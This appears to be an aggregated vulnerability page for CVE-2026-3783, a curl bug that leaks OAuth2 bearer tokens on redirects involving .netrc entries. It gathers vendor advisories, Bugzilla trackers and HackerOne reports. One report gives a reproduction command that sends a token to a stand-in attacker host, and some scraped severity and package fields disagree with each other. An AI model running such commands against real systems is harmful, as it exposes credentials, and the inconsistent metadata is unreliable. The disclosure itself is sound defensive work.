CVE-2026-3783
Published 2026-03-11
Priority P4 · 27 · medium · CVSS 3.1 base score 5.3
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS: 0.03% (8.6th percentile)
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a redirect to a second URL, curl could leak that token to the second
hostname under some circumstances.
If the hostname that the first request is redirected to has information in the
used .netrc file, with either of the `machine` or `default` keywords, curl
would pass on the bearer token set for the first host also to the second one.
Affected
127 ranges · showing 25. Distributions backport the fix, so the upstream version alone is not a reliable indicator: Fedora ships it in curl-8.11.1-8.fc42 and curl-8.15.0-6.fc43, while Debian sid and forky carry it in 8.19.0-1; check the package changelog rather than the version number.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| curl | curl | 7.33.0 – 7.33.0 | — |
| curl | curl | 7.34.0 – 7.34.0 | — |
| curl | curl | 7.35.0 – 7.35.0 | — |
| curl | curl | 7.36.0 – 7.36.0 | — |
| curl | curl | 7.37.0 – 7.37.0 | — |
| curl | curl | 7.37.1 – 7.37.1 | — |
| curl | curl | 7.38.0 – 7.38.0 | — |
| curl | curl | 7.39.0 – 7.39.0 | — |
| curl | curl | 7.40.0 – 7.40.0 | — |
| curl | curl | 7.41.0 – 7.41.0 | — |
| curl | curl | 7.42.0 – 7.42.0 | — |
| curl | curl | 7.42.1 – 7.42.1 | — |
| curl | curl | 7.43.0 – 7.43.0 | — |
| curl | curl | 7.44.0 – 7.44.0 | — |
| curl | curl | 7.45.0 – 7.45.0 | — |
| curl | curl | 7.46.0 – 7.46.0 | — |
| curl | curl | 7.47.0 – 7.47.0 | — |
| curl | curl | 7.47.1 – 7.47.1 | — |
| curl | curl | 7.48.0 – 7.48.0 | — |
| curl | curl | 7.49.0 – 7.49.0 | — |
| curl | curl | 7.49.1 – 7.49.1 | — |
| curl | curl | 7.50.0 – 7.50.0 | — |
| curl | curl | 7.50.1 – 7.50.1 | — |
| curl | curl | 7.50.2 – 7.50.2 | — |
| curl | curl | 7.50.3 – 7.50.3 | — |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| osv | — | 6.5 | MEDIUM | — |
| vendor_ubuntu | — | 6.5 | MEDIUM | — |
| vendor_debian | — | 5.3 | MEDIUM | — |
| vendor_msrc | — | 5.3 | MEDIUM | — |
| vendor_redhat | — | 5.3 | MEDIUM | — |
Ubuntu
curl vulnerabilities
vendor_ubuntu·2026-03-16·CVSS 6.5
CVE-2026-3783 [MEDIUM] curl vulnerabilities
Title: curl vulnerabilities
Summary: Several security issues were fixed in curl.
Zhicheng Chen discovered that curl could incorrectly reuse the wrong
connection for Negotiate-authenticated HTTP or HTTPS requests. This could
result in the use of credentials from a different connection, contrary to
expectations. This issue only affected Ubuntu 20.04 LTS. (CVE-2026-1965)
It was discovered that curl incorrectly leaked OAuth2 bearer tokens when
following a redirect. This could result in tokens being sent to the wrong
host, contrary to expectations. This issue only affected Ubuntu 20.04 LTS.
(CVE-2026-3783)
Muhamad Arga Reksapati discovered that curl incorrectly reused existing
HTTP proxy connections even if the request used different credentials. This
could result in the use of incorrect cr
Red Hat
curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect
vendor_redhat·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CWE-201 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect
curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a redirect to a second URL, curl could leak that token to the second
hostname under some circumstances.
If the hostname that the first request is redirected to has information in the
used .netrc file, with either of the `machine` or `default` keywords, curl
would pass on the bearer token set for the first host also to the second one.
A flaw was found in curl. When an OAuth2 bearer token is used for an HTTP(S) transfer that redirects to a second URL, curl could unintentionally leak the token. This occurs if the second hostname has entries in the `.netrc` file, allowing the bearer token intended for the first host
Ubuntu
curl vulnerabilities
vendor_ubuntu·2026-03-11·CVSS 3.4
CVE-2025-0167 [LOW] curl vulnerabilities
Title: curl vulnerabilities
Summary: Several security issues were fixed in curl.
Zhicheng Chen discovered that curl could incorrectly reuse the wrong
connection for Negotiate-authenticated HTTP or HTTPS requests. This could
result in the use of credentials from a different connection, contrary to
expectations. (CVE-2026-1965)
It was discovered that curl incorrectly leaked OAuth2 bearer tokens when
following a redirect. This could result in tokens being sent to the wrong
host, contrary to expectations. (CVE-2026-3783)
Muhamad Arga Reksapati discovered that curl incorrectly reused existing
HTTP proxy connections even if the request used different credentials. This
could result in the use of incorrect credentials, contrary to expectations.
(CVE-2026-3784)
Daniel Wade discovered that curl
Microsoft
token leak with redirect and netrc
vendor_msrc·2026-03-10·CVSS 5.3
CVE-2026-3783 [MEDIUM] token leak with redirect and netrc
token leak with redirect and netrc
Mariner: Mariner
curl: curl
Customer Action Required: Yes
Debian
CVE-2026-3783: curl - When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer p...
vendor_debian·2026·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783: curl - When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer p...
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one.
Scope: local
bookworm: open
bullseye: open
forky: resolved (fixed in 8.19.0-1)
sid: resolved (fixed in 8.19.0-1)
trixie: open
OSV
curl vulnerabilities
osv·2026-03-16·CVSS 6.5
CVE-2026-1965 [MEDIUM] curl vulnerabilities
curl vulnerabilities
Zhicheng Chen discovered that curl could incorrectly reuse the wrong
connection for Negotiate-authenticated HTTP or HTTPS requests. This could
result in the use of credentials from a different connection, contrary to
expectations. This issue only affected Ubuntu 20.04 LTS. (CVE-2026-1965)
It was discovered that curl incorrectly leaked OAuth2 bearer tokens when
following a redirect. This could result in tokens being sent to the wrong
host, contrary to expectations. This issue only affected Ubuntu 20.04 LTS.
(CVE-2026-3783)
Muhamad Arga Reksapati discovered that curl incorrectly reused existing
HTTP proxy connections even if the request used different credentials. This
could result in the use of incorrect credentials, contrary to expectations.
(CVE-2026-3784)
GHSA
GHSA-8whr-249c-vfjp: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the
ghsa_unreviewed·2026-03-11
CVE-2026-3783 [MEDIUM] CWE-522 GHSA-8whr-249c-vfjp: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a redirect to a second URL, curl could leak that token to the second
hostname under some circumstances.
If the hostname that the first request is redirected to has information in the
used .netrc file, with either of the `machine` or `default` keywords, curl
would pass on the bearer token set for the first host also to the second one.
OSV
curl vulnerabilities
osv·2026-03-11·CVSS 3.4
CVE-2026-1965 [LOW] curl vulnerabilities
curl vulnerabilities
Zhicheng Chen discovered that curl could incorrectly reuse the wrong
connection for Negotiate-authenticated HTTP or HTTPS requests. This could
result in the use of credentials from a different connection, contrary to
expectations. (CVE-2026-1965)
It was discovered that curl incorrectly leaked OAuth2 bearer tokens when
following a redirect. This could result in tokens being sent to the wrong
host, contrary to expectations. (CVE-2026-3783)
Muhamad Arga Reksapati discovered that curl incorrectly reused existing
HTTP proxy connections even if the request used different credentials. This
could result in the use of incorrect credentials, contrary to expectations.
(CVE-2026-3784)
Daniel Wade discovered that curl incorrectly handled certain memory
operations when doing a s
OSV
CVE-2026-3783: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the
osv·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one.
No detection rules found.
No public exploits indexed.
Wiz
CVE-2025-15224 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2025-15224 [LOW] CVE-2025-15224 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15224 :
cURL vulnerability analysis and mitigation
When doing SSH-based transfers using either SCP or SFTP, and asked to do
public key authentication, curl would wrongly still ask and authenticate using
a locally running SSH agent.
Source : NVD
## 3.1
Score
Published January 8, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
cURL
Alma Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
curl
libcurl4
Sources
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity LOW No Fix Added at: Jan 21, 2026
Alpine 3.22, 3.23 Severity LOW No Fix Added at: Jan 28, 2026
Wiz
CVE-2025-15079 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-15079 [MEDIUM] CVE-2025-15079 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15079 :
cURL vulnerability analysis and mitigation
When doing SSH-based transfers using either SCP or SFTP, and setting the
known_hosts file, libcurl could still mistakenly accept connecting to hosts not present in the specified file if they were added as recognized in the
libssh global known_hosts file.
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
cURL
Alma Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
curl-debuginfo
libcurl-devel
Sources
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity MED
Wiz
CVE-2025-14819 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-14819 [MEDIUM] CVE-2025-14819 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14819 :
cURL vulnerability analysis and mitigation
CURLSSLOPT_NO_PARTIALCHAIN
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
cURL
Libcurl
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libcurl-minimal-debuginfo
libcurl-devel-doc
Sources
Alpine 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity MEDIUM Has Fix Added at: Jan 21, 2026
Alpine 3.22, 3.23 Severity MEDIUM Has Fix Added at: Jan 28, 2026
Alpine edge Severity MEDIUM Has Fix Added at: Jan 08, 2026
Container-Optimized OS Severity MEDIUM Has Fix Added at: Mar 03, 2026
Debian 1
Wiz
CVE-2026-3805 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-3805 [MEDIUM] CVE-2026-3805 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3805 :
cURL vulnerability analysis and mitigation
When doing a second SMB request to the same host again, curl would wrongly use
a data pointer pointing into already freed memory.
Source : NVD
## 7.5
Score
Published March 11, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
cURL
Libcurl
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rust-debugger-common
rust-src
Sources
Alpine 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH Has Fix Added at: Mar 13, 2026
Debian 13 Severity MEDIUM No Fix Added at: Mar 12, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 12, 2026
Homebrew Severity HI
Wiz
CVE-2025-14524 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-14524 [MEDIUM] CVE-2025-14524 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14524 :
cURL vulnerability analysis and mitigation
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP,
POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new
target host.
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
cURL
Alma Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libcurl-devel-32bit
curl-zsh-completion
Sources
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity MEDI
Wiz
CVE-2026-3784 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-3784 [MEDIUM] CVE-2026-3784 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3784 :
cURL vulnerability analysis and mitigation
curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a
server, even if the new request uses different credentials for the HTTP proxy.
The proper behavior is to create or use a separate connection.
Source : NVD
## 6.5
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
cURL
Alma Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libcurl
rust-doc
Sources
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity MEDIUM Has Fix Added at: Mar 13, 20
Wiz
CVE-2026-1965 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-1965 [MEDIUM] CVE-2026-1965 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1965 :
cURL vulnerability analysis and mitigation
libcurl can in some circumstances reuse the wrong connection when asked to do
an Negotiate-authenticated HTTP or HTTPS request.
libcurl features a pool of recent connections so that subsequent requests can
reuse an existing connection to avoid overhead.
When reusing a connection a range of criterion must first be met. Due to a
logical error in the code, a request that was issued by an application could
wrongfully reuse an existing connection to the same server that was
authenticated using different credentials. One underlying reason being that
Negotiate sometimes authenticates connections and not requests , contrary
to how HTTP is designed to work.
user1:password1
user2:password2
CURLOPT_HTTPAUTH
CURLOPT_FRESH_CONNECT
C
Wiz
CVE-2025-13034 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2025-13034 [MEDIUM] CVE-2025-13034 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-13034 :
cURL vulnerability analysis and mitigation
CURLOPT_PINNEDPUBLICKEY
--pinnedpubkey
This check was skipped in a certain condition that would then make curl allow
the connection without performing the proper check, thus not noticing a
possible impostor. To skip this check, the connection had to be done with QUIC
with ngtcp2 built to use GnuTLS and the user had to explicitly disable the
standard certificate verification.
Source : NVD
## 5.9
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
cURL
Libcurl
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
curl
curl
Wiz
CVE-2025-11563 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2025-11563 [MEDIUM] CVE-2025-11563 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11563 :
cURL vulnerability analysis and mitigation
## Overview
CVE-2025-11563 is a path traversal vulnerability affecting wcurl, discovered on October 6, 2025, and publicly disclosed on November 4, 2025. The vulnerability affects wcurl versions shipped with curl 8.14.0 to 8.16.0 and standalone wcurl versions from 2024.12.08 to 2025.09.27. This security flaw allows URLs containing percent-encoded slashes (/ or ) to trick wcurl into saving output files outside of the current directory without explicit user permission ( Curl Advisory ).
## Technical details
The vulnerability is classified as CWE-35: Path Traversal with a Moderate severity rating. The issue stems from wcurl's handling of percent-encoded slashes in URLs, where the tool incorrectly processes URLs containing p
Wiz
CVE-2025-14017 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-14017 [MEDIUM] CVE-2025-14017 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14017 :
cURL vulnerability analysis and mitigation
When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,
changing TLS options in one thread would inadvertently change them globally
and therefore possibly also affect other concurrently setup transfers.
Disabling certificate verification for a specific transfer could
unintentionally disable the feature for other threads as well.
Source : NVD
## 6.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
cURL
Libcurl
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
snphost
cpe:2.3:a:haxx:curl
Sources
Alp
Wiz
CVE-2026-3783 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3783 :
cURL vulnerability analysis and mitigation
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a redirect to a second URL, curl could leak that token to the second
hostname under some circumstances.
If the hostname that the first request is redirected to has information in the
used .netrc file, with either of the `machine` or `default` keywords, curl
would pass on the bearer token set for the first host also to the second one.
Source : NVD
## 5.3
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
cURL
Alma Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
s390utils-mon_statd
trustee-guest-components
Sources
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity MEDIUM Has Fix Ad
HackerOne
Bearer Token Leaked to Attacker via .netrc Despite CVE-2026-3783 Fix
hackerone·2026-03-26·CVSS 5.3
CVE-2026-3783 [MEDIUM] Bearer Token Leaked to Attacker via .netrc Despite CVE-2026-3783 Fix
Bearer Token Leaked to Attacker via .netrc Despite CVE-2026-3783 Fix
curl versions 8.19.0 and later were meant to fix CVE-2026-3783, which causes OAuth2 bearer tokens to leak on HTTP redirects when the user has a .netrc file configured. However, the vulnerability still exists in the current codebase.
VULNERABILITY: When a curl user specifies an OAuth2 bearer token via --oauth2-bearer and also uses the --netrc flag to enable .netrc authentication, curl fails to prevent the bearer token from being sent to redirect targets.
AFFECTED VERSIONS: 8.17.0, 8.19.0, 8.19.1-DEV, 8.19.x
REPRODUCTION:
1. Create .netrc with attacker domain entry
2. Run: curl --oauth2-bearer 'SECRET_TOKEN' --netrc --location http://redirect-to-attacker.com
3. Bearer token sent to attacker
ROOT CAUSE: lib/http.c:825-8
Bugzilla
CVE-2026-3783 trustee-guest-components: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
bugzilla·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 trustee-guest-components: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
CVE-2026-3783 trustee-guest-components: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
This message is a reminder that Fedora Linux 42 is nearing its end of life.
Fedora will stop maintaining and issuing updates for Fedora Linux 42 on 2026-05-13.
It is Fedora's policy to close all bug reports from releases that are no longer
maintained. At that time this bug will be closed as EOL if it remains open with a
'version' of '42'.
Package Maintainer: If you wish for this bug to remain open because you
plan to fi
Bugzilla
CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
bugzilla·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
FEDORA-2026-907bbf2a13 (curl-8.11.1-8.fc42) has been submitted as an update to Fedora 42.
https://bodhi.fedoraproject.org/updates/FEDORA-2026-907bbf2a13
---
FEDORA-2026-907bbf2a13 has been pushed to the Fedora 42 testing repository.
Soon you'll be able to install the update with the following command:
`sudo dnf upgrade --enablerepo=updates-testing --refresh --advisory=FEDORA-2026-907bbf2a13`
You can provide feedback for this update here:
Bugzilla
CVE-2026-3783 mingw-curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
bugzilla·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 mingw-curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
CVE-2026-3783 mingw-curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
This message is a reminder that Fedora Linux 42 is nearing its end of life.
Fedora will stop maintaining and issuing updates for Fedora Linux 42 on 2026-05-13.
It is Fedora's policy to close all bug reports from releases that are no longer
maintained. At that time this bug will be closed as EOL if it remains open with a
'version' of '42'.
Package Maintainer: If you wish for this bug to remain open because you
plan to fix it in a curr
Bugzilla
CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect
bugzilla·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect
CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a redirect to a second URL, curl could leak that token to the second
hostname under some circumstances.
If the hostname that the first request is redirected to has information in the
used .netrc file, with either of the `machine` or `default` keywords, curl
would pass on the bearer token set for the first host also to the second one.
HackerOne
CVE-2026-3783: token leak with redirect and netrc
hackerone·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783: token leak with redirect and netrc
CVE-2026-3783: token leak with redirect and netrc
## Summary
When `--oauth2-bearer` is used with `--netrc` and curl follows a redirect, the bearer token leaks to the redirect target. The netrc bypass at `http.c:822` skips `Curl_auth_allowed_to_host()`, allowing the token through. This is an incomplete fix for CVE-2025-14524 — the Dec 2025 SASL fix patched `curl_sasl.c` but missed the HTTP bearer path.
This is an incomplete fix for the same vulnerability class as CVE-2025-14524. The Dec 2025 SASL bearer fix (commit `1a822275d3`, PR #19933) patched `lib/curl_sasl.c` but left the HTTP bearer path at `lib/http.c:704-714` unprotected.
## Version
curl 8.10.1 (confirmed), also present in current master `d9c2c64337`. All versions supporting `--oauth2-bearer` with `--netrc` are affected.
**The n
Bugzilla
CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-43]
bugzilla·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-43]
CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-43]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
FEDORA-2026-66db242036 (curl-8.15.0-6.fc43) has been submitted as an update to Fedora 43.
https://bodhi.fedoraproject.org/updates/FEDORA-2026-66db242036
---
FEDORA-2026-66db242036 has been pushed to the Fedora 43 testing repository.
Soon you'll be able to install the update with the following command:
`sudo dnf upgrade --enablerepo=updates-testing --refresh --advisory=FEDORA-2026-66db242036`
You can provide feedback for this update here:
Bugzilla
CVE-2026-3783 rpi-imager: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
bugzilla·2026-03-11·CVSS 5.3
CVE-2026-3783 [MEDIUM] CVE-2026-3783 rpi-imager: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
CVE-2026-3783 rpi-imager: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
This message is a reminder that Fedora Linux 42 is nearing its end of life.
Fedora will stop maintaining and issuing updates for Fedora Linux 42 on 2026-05-13.
It is Fedora's policy to close all bug reports from releases that are no longer
maintained. At that time this bug will be closed as EOL if it remains open with a
'version' of '42'.
Package Maintainer: If you wish for this bug to remain open because you
plan to fix it in a curr
Published 2026-03-11